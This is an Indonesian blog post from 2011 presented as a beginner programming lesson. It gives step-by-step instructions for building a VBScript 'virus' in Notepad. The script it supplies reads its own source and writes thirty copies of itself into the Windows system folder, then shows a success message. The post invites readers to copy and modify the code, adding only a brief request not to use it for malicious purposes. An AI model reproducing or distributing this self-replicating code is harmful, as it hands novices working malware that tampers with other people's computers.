NO IMAGE AVAILABLE

Oct 22, 2011

Pembuatan Virus Dengan VBScript

0 komentar

Jayakarta, 22 Oktober 2011
Hey para Blogger...... apa kabarnya nich kalian semua...???
Hemm..... mungkin ane pikir dari semua postingan ane belum ada yang menampilkan tentang edukasi pemograman.

Nah sekarang ane mencoba membagi ilmu yang sedikit ini untuk agan-agan semua yang baru belajar metode pemograman, mungkin ane coba membagi sedikit logika algoritmanya saja namun sekaligus ane terapkan di kodingnya.

Pada masalah ini ane mencoba membuat sedikit script untuk pembuatan Virus dengan format VBScript.
Sebagai catatan ini hanya untuk media pembelajaran kita saja ya, boleh di copy-paste dan diedit-edit sendiri sesuai keinginan dan kemampuan kita saja namun jangan untuk ngembangin niat jahat ya gan, hanya sekedar tahu saja lah....!!!!

Langkah-langkahnya :
1. Buka NotePad
    Windows - All Programs - Accecsories - Notepad
2. Copy-paset script di bawah ini :
    Dimulai dari "on error resume next" sampai "msgbox(" Virus Berhasil Berjalan ^.^")".






<----------------------------- Virus VBS -----------------------------------!>


on error resume next
set exCode=CreateObject("Scripting.FileSystemObject")

set crack=exCode.OpenTextFile(Wscript.ScriptFullName)
kloning=crack.readAll
crack.close

xWind =exCode.GetSpecialFolder(0)

for n=1 to 30

set kloner=exCode.CreateTextFile(xWind & "\Jalanjalan" &n& ".vbs")
kloner.write kloning
kloner.close
next
msgbox(" Virus Berhasil Berjalan ^.^")

<----------------- Script Virus VBS --------------------------!>

Save file nya dengan format : NameFile.vbs
contoh : Dor.vbs

Nah ane rasa cukup segitu aja ya gan, untuk selebihnya silahkan coba-coba sendiri aja gan!

Thanks ya udah baca coretan saya ini semoga bermanfaat buat kita semua dan ingat "Jangan Di Gunakan Untuk Ngembangin Niat Jahat!"

Post a Comment


Mohon tinggalkan komentar anda di sini!
Mohon jangan lakukan spamming!
Terima kasih atas kerja samanya!